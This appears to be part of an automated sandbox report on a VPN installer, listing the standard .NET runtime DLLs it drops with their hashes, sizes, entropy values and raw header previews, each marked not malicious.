                                                                                                                                                                                                  SHA-512:DE03A0697BC307068E40CC7C222212D14E3111ED053F951F7A322145AB2401BE2B82DF31D8900A9869BB42A1E99907B43469806A1858F856B7EBA3DBA7691B5F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..P............... ....`......P'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3......................................z...............\.....0.....3.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.961231388184548
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WNoqWD7WehqWOHlLf2KQcvBZ9LYWnS+ShjmM6IGBkSEO:WNofXq3b2KZBZacS+ST6nku
                                                                                                                                                                                                  MD5:A1F43C6D3477069B1B95862F64AEBBBA
                                                                                                                                                                                                  SHA1:64F5CF2A3339AB312CE62F0C4798B8B593EF31A0
                                                                                                                                                                                                  SHA-256:964560E4A4B6F28313374D54E91AAB94B7E8D69EF602BF8097B542E2C24CAEF1
                                                                                                                                                                                                  SHA-512:833C5004DE4A309139F077971DED62A62D45D58EE91DA86F53BAA4F1ADB36DABD0A9F754A263F35A11E6F76726E115794AFD387F1A94C80100B0DFC1979A8391
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................c....@.................................|(..O....@..@............... ....`......D'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ..t....................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.971342636879885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3GETSAWUEWWhqWOHlLf2KQcvBZ9ifYS+ShjmM6IGBkSx:rT18q3b2KZBZyYS+ST6nkG
                                                                                                                                                                                                  MD5:E0E4EF5AEA0AE7E6BC065FFEB26CD09B
                                                                                                                                                                                                  SHA1:8B17220D5815337590549CAF18784A66485D3E76
                                                                                                                                                                                                  SHA-256:AF3258FCF4FBE8B8A0A89AFEAC28E487A8BEAD824465C5A24B773197C5E27C5F
                                                                                                                                                                                                  SHA-512:302391EFDD8D40A07498C77E8CB0ADA87B0898ACEDDFACFAC53026A19746B5694E05107C84B85CDBD56B5F0A2D6AFD2C310FE7D990CEB91774334C7C591185CD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............B)... ...@....... ....................................@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3............................................................T.....,.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):111648
                                                                                                                                                                                                  Entropy (8bit):5.56134106992795
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:kPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/f3qKfuo/m1:kWw0SUUKBM8aOUiiGw7qa9tK/fio/O
                                                                                                                                                                                                  MD5:44D0AB5E4D54C2EDB7C8FBA9CED026ED
                                                                                                                                                                                                  SHA1:04328EE0F3BBCD8D0567A530431FFCF24CFF58B7
                                                                                                                                                                                                  SHA-256:FBB6E048E1A2FBB2EE2A9D20070DFF1D91155670F37241960B3F119F5DBE4ED1
                                                                                                                                                                                                  SHA-512:B7E31CC9F9C86F2F31B8340EFF76F9777402AD0B0D470B5D8245D2B0067F1F101C0E84218ED8CE7BE9DDA217FC5EA5808155133E3FA2709292252E9BEA0B9EC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ....................................@.................................f...O....................... ........................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.953385301880804
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:KcDagtDApWSKJWmhqWOHlLf2KQcvBZ9AQSS+ShjmM6IGBkSl:KPKBlq3b2KZBZSS+ST6nki
                                                                                                                                                                                                  MD5:B0F855439076CBAE234ADC363FA0454A
                                                                                                                                                                                                  SHA1:AA2AFB641C8AC4FD2A4796877A77C846AA287259
                                                                                                                                                                                                  SHA-256:4FC68C92932A97435D5996357A89BD6995449591777795E9A42C5063243550C7
                                                                                                                                                                                                  SHA-512:708C1F9B0593CE52A76AE33117C5736BA7B2C4BF006A6D1CF9925550D2620FDB8BA963800863CF89958CBD6AED803419F1C71449D458B50F585327CA9AE749E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............+... ...@....... ....................................@.................................0+..O....@.................. ....`.......)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d+......H.......P ..(...................x)......................................BSJB............v4.0.30319......l...x...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................x.........w.o.....o.....\...............<.....Y.................................................G...........V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.962671992726357
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7IWD4WkhqWOHlLf2KQcvBZ9TW4rS+ShjmM6IGBkSW:71Sq3b2KZBZI4rS+ST6nkd
                                                                                                                                                                                                  MD5:B01A80E33A269BF097DBD547BB235468
                                                                                                                                                                                                  SHA1:4BE2ADF5E7EF0BE39D2D917B7B91460396CF8D41
                                                                                                                                                                                                  SHA-256:ABA7106AAA97C956C535990A878CE66DEFE54F064C7616DD2DBF8A9EB6D44ACE
                                                                                                                                                                                                  SHA-512:39FD2FCCEC11F6906CFE453FFE784A98762918BDBB82C47868CC7E3F6CA4EC314DA717D3F3BF5DF50274D9026BF4DBCE5271BD485710BF3A88F471F714705C1B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................h7....@..................................(..O....@..@............... ....`......\'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....d.......#US.h.......#GUID...x.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.89896808782791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:BMWzQWjhqWOHlLf2KQcvBZ9RDS+ShjmM6IGBkS5Pz:B5rq3b2KZBZbS+ST6nkWb
                                                                                                                                                                                                  MD5:264B3192B5C2C364C8B9AE2790B19153
                                                                                                                                                                                                  SHA1:92CD47F6707C0C598A23973C27BDA209108E0D7B
                                                                                                                                                                                                  SHA-256:06B51B094FAF31639B7B3F7B9569BC7B46A24BFB4BF4E726854503AA3B558C19
                                                                                                                                                                                                  SHA-512:A1CAFAB90CDAE27CB71BEFEE3BDAF8981E93D5B8C11E1E27186C6B721BC2BE05C2DADA828D723A3E3EBFF4AE3C93736472ED9BE645815FE5E1262AC514E0B182
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............N*... ...@....... ..............................].....@..................................)..O....@..@............... ....`.......(............................................... ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B................0*......H.......P ......................D(......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................z.....N.....:.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.840362171078928
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+xDHKWAMW7hqWOHlLf2KQcvBZ93WXS+ShjmM6IGBkSMZLT:aD8jq3b2KZBZAXS+ST6nkrtT
                                                                                                                                                                                                  MD5:CA9071B879DFAEF54855D52E3DE0B199
                                                                                                                                                                                                  SHA1:9E6339E4B9BE8C070FB085098C727356D5DEE679
                                                                                                                                                                                                  SHA-256:665235BA4540CF50F9AD55572FF1396405205FD9E534D544542E338BD95D09B9
                                                                                                                                                                                                  SHA-512:5EF846C39C0F2C259262315F00D2AAE41EA83D797B8738E6878CBA26DD8654ECD878D036973114CD1E7B6405C6C2895F32CE33C8059D85B8CE14E3FA4C33CCB9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ..............................W~....@................................. ,..O....@.................. ....`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID...........#Blob......................3................................"...............1.............{.................................Q.....j.......................n...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.937994273396533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:v7LNBEW6pW4hqWOHlLf2KQcvBZ92d2S+ShjmM6IGBkSr:v7bMDq3b2KZBZfS+ST6nk4
                                                                                                                                                                                                  MD5:484B57EB0009BC68590CE5EB4A8DA97C
                                                                                                                                                                                                  SHA1:B0770A0D87F11173925C3890C42C257E9A8AE8F3
                                                                                                                                                                                                  SHA-256:C470136E7C0CA4A95A2BD2A0F33A7FF6BC9FFF04A6668B93FEEC1E6F76159B13
                                                                                                                                                                                                  SHA-512:58A7C977181AB80F21F28E5CC384D32188596FAB4351785A1F26332FC91D690C6B7A1C5B8C638146C42A8069202AFA6877986C3D7D5F586999FEE5ABAD2B7551
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................|....@.................................D(..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9847654286076075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SKkHKW/tWZhqWOHlLf2KQcvBZ9e/MES+ShjmM6IGBkSJ:HuMq3b2KZBZIMES+ST6nky
                                                                                                                                                                                                  MD5:6CDF73BC6BBA86E628C7B38EDE282D29
                                                                                                                                                                                                  SHA1:A4D3651095CD90BB3499C311EE2D10A2168DA11B
                                                                                                                                                                                                  SHA-256:2E0406BCD2ADAA557F15CEA8F0068F5CF5F7D3DF081162B47EA7033C90CC3907
                                                                                                                                                                                                  SHA-512:7AEDC6B41B9B36A84FF6C0135EDE27EA533F6BE747F1552242E367D21FE945D815187D947BDE53D935F8049CAE5F17E0097E79A245EDA6425EF6817393490C22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................{....@..................................(..O....@..`............... ....`.......'............................................... ............... ..H............text...4.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................$'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................W.....W...R.D.........f.......................=.....V.....}...........q.........................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.938915021718061
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:bLnfIWqrWKhqWOHlLf2KQcvBZ9G4oS+ShjmM6IGBkSzC:bDf4zq3b2KZBZcS+ST6nk5
                                                                                                                                                                                                  MD5:7A8C5FD63F340E3A954FC88935DAF382
                                                                                                                                                                                                  SHA1:0445BC7202F7210085C141CD98B48D25350A7FBA
                                                                                                                                                                                                  SHA-256:7A2A22676BFF819F0BE8D538581FB6532BE3C4E1B68C46D6F25338C2A2D1C200
                                                                                                                                                                                                  SHA-512:922CCE6D593A83B2BADF5D8F9AB5C3B2FA2DFE59FEA58CB4B374A49844061948F2277A41F185B0DB3895E468889AFEF40702DE193A8A7AB8BD941CCA16650B85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................D(..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.706301164600095
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:zybU8ndrbbT9NWB2WLhqWOHlLf2KQcvBZ9FAbS+ShjmM6IGBkS5:zy5ndvWlq3b2KZBZiS+ST6nkG
                                                                                                                                                                                                  MD5:9B69D7A653CF321BF2236EC3D2D0989D
                                                                                                                                                                                                  SHA1:E0EACFC753D1B590D04FC2423D3712635BE34109
                                                                                                                                                                                                  SHA-256:A5968200CB47E3D2911656095C2A64684EF1B671DD1FCEAB6DF21E67CA167D02
                                                                                                                                                                                                  SHA-512:D8FBC56DCA9A18706E33BDED2A95CB5131D298C9039CC7D0CF30ABD490EA2084850E8558C778DAC5E47349250810ABAC531CC5CB00DA41D7C52D219BAD0BD168
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ksa...........!.................6... ...@....@.. ..............................+.....@..................................6..K....@...............".. ....`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................6......H.......D%..<...................P ......................................_...+.'g.......x2..}}...B.O....T...e..?.M..R"M.~pg..c..LD#..y.....y....:u.v*...#.;.-.h.......0..#.....a5|T%W...].!.%'..9.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.92741421615125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Jna8WK1WchqWOHlLf2KQcvBZ9ehS+ShjmM6IGBkSi:Jna0Dq3b2KZBZyS+ST6nkh
                                                                                                                                                                                                  MD5:181B7B7DD03571FDBA1DB949008F3A27
                                                                                                                                                                                                  SHA1:0A2EC802959DD458243EDB23E1185522614649CF
                                                                                                                                                                                                  SHA-256:434085D54A52A6A04B59907392D29D335CD580C1D2ADE9B2D594E36F1BAEEB2D
                                                                                                                                                                                                  SHA-512:312C5F69C05D0B7BA98AE3434C7A07CFA7F016DC5B3E5C51A01AA1DFA569261E462F85D5393466A9CF2A59838696CAA5DAB42D72ED238553B2C5BB56E564246C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............j*... ...@....... ....................................@..................................*..O....@.................. ....`.......(............................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......P ......................`(......................................BSJB............v4.0.30319......l...@...#~......0...#Strings............#US.........#GUID....... ...#Blob......................3................................................w.................!...........<.....Y.............................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.8768271726692625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sBSWITWEhqWOHlLf2KQcvBZ9eB/HTS+ShjmM6IGBkSC3:s6Jq3b2KZBZ6TS+ST6nkz
                                                                                                                                                                                                  MD5:09F7DC412A8BC2939DF58390A44EF397
                                                                                                                                                                                                  SHA1:8CF0D78B3E2D03393D6D3681E140B56F5539295D
                                                                                                                                                                                                  SHA-256:0168F05FB92421C3CBCDEB4E61CC018FBC970900DC0373AC89D2BBB8F3796738
                                                                                                                                                                                                  SHA-512:4CCF2E3AC7B5EDBEFB7E82044DF8890B022CE7270E348353D45C00A743EDA6F6C0513606E264D77892EC16A0A31CFC456575D95B8C394BC557F1E95DBB5A7855
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............*... ...@....... ...............................m....@..................................)..O....@.. ............... ....`.......(............................................... ............... ..H............text...$.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................|.....|...S.i.........g.................f...........5.....~...........P.....9...................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c.......................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Handles.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.980168973605658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:o88cIIWNoWOhqWOHlLf2KQcvBZ9u6hJS+ShjmM6IGBkSpjR:o9cU0q3b2KZBZNS+ST6nkqR
                                                                                                                                                                                                  MD5:4AD043270CCF1EC848BA0D701F96707F
                                                                                                                                                                                                  SHA1:5DB514D9CBDD964A68C3DF3979DF1076D22F771F
                                                                                                                                                                                                  SHA-256:F37BE601E91F79D5950FD8CB00F78DE8219F62CC356DB811864670B5214E00DD
                                                                                                                                                                                                  SHA-512:B7DA1F79F8A92765FAFB9237EDC24878DD0CAB1AB94443B3DD0C1ED51346E9E602609C4D3AA1B17F2FFC57066259DBA075245ED47BBFAD5E4A2C348256AD54C1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............V)... ...@....... ....................................@..................................)..O....@.................. ....`.......'............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8)......H.......P ......................L'......................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...........#Blob......................3..................................................*.....*...c.....J.....w.................v.....,.....E.................`.....I...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24096
                                                                                                                                                                                                  Entropy (8bit):6.719377001772263
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:hkUwx9rm5go1fWKmmW6oqN5eWjaWShqWOHlLf2KQcvBZ9P/dS+ShjmM6IGBkS3:QrmoFmWdOSq3b2KZBZ7S+ST6nk4
                                                                                                                                                                                                  MD5:00C714EC354CEDC187475C1316951F60
                                                                                                                                                                                                  SHA1:A8FA0FCE113FC2ADBED50CA893B466C840B5511A
                                                                                                                                                                                                  SHA-256:FBA71B0BB6318887131D2035EB5FEBB666D1A9C912F64CDAAB3C5756D0BD34C9
                                                                                                                                                                                                  SHA-512:464B617EA3097BCB9D1F150B13535F8DAB7339AEE6F5766F5DC1641374E318186B17F284BEB9B7D2DFE2AA61385AE9DA243810ABB4A4E4B9049EED94D823C7B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..&...........E... ...`....... ..............................z.....@.................................PE..O....`..x............0.. ............D............................................... ............... ..H............text....%... ...&.................. ..`.rsrc...x....`.......(..............@..@.reloc..............................@..B.................E......H........$...............A.......C......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r/..p.(....*......(....*2(.....(....*^~....-.(.........~....*.0..........~..........(.........(....-Y..(!....{/......5..,

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
